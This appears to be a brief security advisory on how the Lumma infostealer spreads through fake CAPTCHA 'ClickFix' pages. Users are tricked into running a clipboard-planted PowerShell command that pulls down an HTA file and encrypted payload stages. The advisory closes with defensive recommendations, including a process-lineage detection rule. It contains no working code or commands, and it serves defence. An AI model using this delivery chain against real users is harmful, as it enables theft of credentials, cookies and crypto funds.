Lumma Infostealer: Delivering Malware via Fake CAPTCHA Pages

In recent years, researchers observed a surge in Information Stealing (Infostealer) malware and their sophistication level. Infostealer’s purpose is to gather sensitive information such as financial data or information stored on a device such as credentials, browser & cookie data, documents and machine details.  

The tactic that Lumma Stealer uses has been named “ClickFix” by researchers at Sekoia.  Lumma malware distribution has been facilitated through a large-scale malvertising campaign that masquerades as CAPTCHA verification. Another characteristic of the malware is monitoring clipboard activity, therefore when a crypto wallet address is copied, it replaces it with one controlled by the attacker.

In this attack scenario, users are being redirected to a fake CAPTCHA verification page which contains a JavaScript snippet that copies a malicious PowerShell command to the victim’s clipboard. Further, user is instructed to run the command in Windows Run dialog box, once this ran it downloads a malicious HTA file.

Once the HTA file runs, it downloads additional PowerShell scripts, which are encrypted with AES. These scripts are responsible for executing the final Lumma Stealer payload.

Recommendations

• Use browser extensions to block malicious scripts and mitigate the risk of drive-by downloads.
• Monitor network traffic for unusual patterns, particularly related to outbound communications to unfamiliar IP addresses or domains.
• Create detection rules for PowerShell or bitsadmin processes that have the parent process mshta.exe and the command line contains an URL
• Restrict and prevent non-admin users from running scripts.

More technical details can be found here